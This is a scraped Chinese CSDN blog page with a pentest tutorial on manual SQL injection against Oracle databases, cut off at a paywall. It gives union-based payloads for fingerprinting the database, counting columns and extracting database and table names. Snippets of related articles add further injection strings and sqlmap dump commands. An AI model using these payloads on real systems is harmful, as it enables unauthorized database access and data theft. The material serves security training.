SQL注入--Oracle

最新推荐文章于 2024-08-20 20:00:21 发布
最新推荐文章于 2024-08-20 20:00:21 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: SQL注入 漏洞 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pygain/article/details/52763126
版权
本文详细介绍了如何通过SQL注入技术判断目标是Oracle数据库,并逐步揭示数据库名称、表名、字段名以及字段值等敏感信息,包括使用order by、union select等方法探测数据库结构,以及获取数据库版本、用户权限等关键信息。
摘要由CSDN通过智能技术生成

1.判断是否为oracle数据库

id=88 and exists(select *from dual)

id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库


2.查询字段数

order by 4 异常

order by 3 正常   最大列数为3


3.判断字段类型

id=88 union select null,null,null from dual 判断这三个列是否有类型异常,返回正常则继续

id=88 and 1=2 union select 'ss',null,null/null,'ss',null/null,null,'ss'  返回正常判断哪个列数为字符型 可用来显示查询结果


4获取所有数据库的名字(假设第二位为字符型)

id=88 and 1=2 union select null,(select global_name from global_name),null from dual

id=88 and 1=2 union select null, (select sys.database_name from dual),null from dual

id=88 and 1=2 union select null,(select name from v$database),null from dual  几个特殊的库的名字

id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual

id=88 and 1=2 union se

最低0.47元/天 解锁文章
帽子不够白
关注
专栏目录
Oracle注入(基础篇)
hackzkaq的博客
03-01 4412
零基础学黑客,搜索公众号:白帽子左一 先了解Oracle一些内容 Oracle做联合注入的注意事项(附带示例) 联合查询的字段数必须和前面的查询语句字段数一致 select id,username,password from admin union select 1,'admin' from dual (X) 联合查询的字段类型也必须和前面的查询语句字段类型一致 select id,username,password from admin union select 1,2,3 from dual (X)
Oracle数据库注入
weixin_50464560的博客
08-06 1584
0x01 前言 在渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...
Oracle手工注入
最新发布
qq_65852138的博客
08-20 1024
Oracle手工注入
Sql注入oracle
mdp1234的博客
07-29 220
Sql注入oracle 介绍 oracle是由甲骨文公司开发的大型数据库,一般应用于电商,铁路,银行等企业, 它具有如下特点: 支持多用户,大事务量处理 数据安全性和完整性的有效控制 支持分布式数据处理 移植性强 常用jsp+oracle 数据库判断 and exists(select * from dual) 或 and exists(select * from user_tables) 联合注入 假设列数为5 union select null,null,null,n
sql注入oracle(1)
qq_43423320的博客
03-16 1814
sql注入oracle 1. 判断oracle and exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 -- 2. 获取基本信息 (1) 获取字段数 order by N (2) 获取数据库版本 and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual (3)获取数据库
Oracle SQL 注入
prahs的专栏
07-14 8922
Oracle SQL 注入本文主要总结在Oracle注入中的步骤方法和注意事项: 参考了:http://www.freebuf.com/articles/web/5411.html 注入常用语句 常用步骤 注意事项 常用步骤1 找注入点 用单引号’之类的触发报错 用or 1=1, or 1=2之类的观察反馈 2 判断数据库类型 oracle 支持– 类型注释,但是不支持;分隔执行多语句,orac
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1271
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
oracle体系结构------Oracle 使用PreparedStatement防止SQL注入---转载
alexliu6711的博客
10-22 257
一条效率差的sql语句,足以毁掉整个应用. Statement是PreparedStatement的父接口,不进行预编译操作,减少了进行预编译的开销.单次运行PreparedStatement要比Statement要慢一些.PreparedStatement可以实现Statement的所有功能,但是之所以叫它预编译指令,是因为在创建它的一个对象时可以给定具有一定格式的SQL字符串...
SQL注入-05-防御修复建议
xhxtalent的博客
12-03 3394
关于SQL注入漏洞的修复建议,防御攻击者攻击数据库,防止攻击者获取数据库重要信息!!!
sql注入-error、boolean、time-based and 宽字节
我不是大牛
06-24 1835
1、Error-based SQL injection 利用前提: 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysqli_error() 优点: 不需要显示位 缺点: 需要输出mysqli_error( )的报错信息 通过floor报错 select 列1(count()) , 列2(concat()随机数) as x from 表 group by x; select c...
Oracle也有注入漏洞
09-11
Oracle也有注入漏洞
SQL注入(Oracle显错注入)---zkaq
weixin_38237216的博客
04-11 1163
1.概念 1.oracle数据库特点:很死板 ,非常讲究语法格式 2.dual:dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,dual表实际作用只是为了满足oracle数据库的语法格式 3.特点:没有database()函数,没有limit用法。 4.常用的语句 select * from all_tables 查询出所有的表 select * from user_tables 查询出当前用户的表 select*from all_tab_columns 查询出
Oracle SQL注入常用语句
weixin_34117522的博客
11-23 707
解析IP select utl_inaddr.get_host_address('google.com') from dual; 获取本机IP地址 select utl_inaddr.get_host_address from dual; 根据IP地址反向解析主机名 select utl_inaddr.get_host_name('10.80.18.24...
Oracle 注入
kuuhh的博客
11-24 444
判断注入 id=1 and 1=1-- id=1 and 1=2-- 通过<>(不等于) id=1 and 1<>2-- id=1 and 1<>1-- 联合查询 判断列数 id=1 order by 4-- 空位用null填充,得到回显位 id=-1 union select null, null, null, null from dual -- id=-1 union select null, to_nchar('aaa'), to_nchar('bbb'), nu
Oracle注入
weixin_48141183的博客
11-03 7168
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 近日学习了Oracle的注入,写这篇文章主要当作自己的笔记,也希望能成为大家的参考。 一、Oracle的获取数据的基本技巧 1.特殊表 • dual表 ◆ 是一个虚拟的表,用来构成select的语法规则,oracle保证dual里面永远只有一条记录。 • user_tables表 ◆ 该表的ta.
网络安全进阶学习第十五课——Oracle SQL注入
p36273的博客
08-08 1787
Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。Oracle服务默认端口:1521Oracle和MySQL数据库语法大致相同,结构不太相同。最大的一个特点就是oracle可以调用Java代码。Oracle要求select … from 后必须要有查询的表名。
sql漏洞注入,Oracle,MongoDB等注入(15)
san3144393495的博客
04-22 414
这一对比就发现access数据比其他数据库要低一个等级,在搭建网站的时候access网站,数据会保存到网站源码下面,就在他网站源码下面,换一个网站也是access,他们是互不相干的没有关系,像我们之前提到过跨库注入,mysql下面就可能存在数据a,数据库b,就可以通过数据a获取到数据库b信息,access就没有,因为他的数据库是独立村存在的,每一个网站就是自己的,不和其它网站相关,没有任何关系。之后再猜,猜不出来了,就只能用工具去跑出来,列名实在不知道,跑出来是passwd。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值